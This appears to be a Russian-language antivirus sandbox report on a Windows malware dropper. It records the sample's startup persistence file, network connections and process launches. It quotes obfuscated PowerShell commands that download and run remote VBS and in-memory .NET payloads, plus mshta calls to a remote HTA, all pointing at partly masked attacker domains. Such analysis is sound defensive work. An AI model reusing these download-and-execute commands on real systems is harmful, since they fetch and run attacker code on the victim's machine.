Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
Вредоносные функции
Загружает
- http://ma#####reservas.com.br/car/upload.png
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ma#####reservas.com.br/Server.Server'',$env:temp+''\\''+''Brow.vbs'')'|D; s...
- '<SYSTEM32>\wscript.exe' "%TEMP%\Brow.vbs"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\brow.vbs
Сетевая активность
Подключается к
- 'wo##.##-a-rockstar.com':1000
TCP
Запросы HTTP GET
- http://ma#####reservas.com.br/mac.hta
- http://ma#####reservas.com.br/Server.Server
- http://ma#####reservas.com.br/car/Upload.png
UDP
- DNS ASK ma#####reservas.com.br
- DNS ASK wo##.##-a-rockstar.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\Brow.vbs"
- '<SYSTEM32>\mshta.exe' http://ma#####reservas.com.br/mac.hta' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ma#####reservas.com.br/Server.Server'',$env:temp+''\\''+''Brow.vbs'')'|D; s...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''http://ma#####reservas.com.br/car/Upload.png'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($null,$n...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\mshta.exe' http://ma#####reservas.com.br/mac.hta
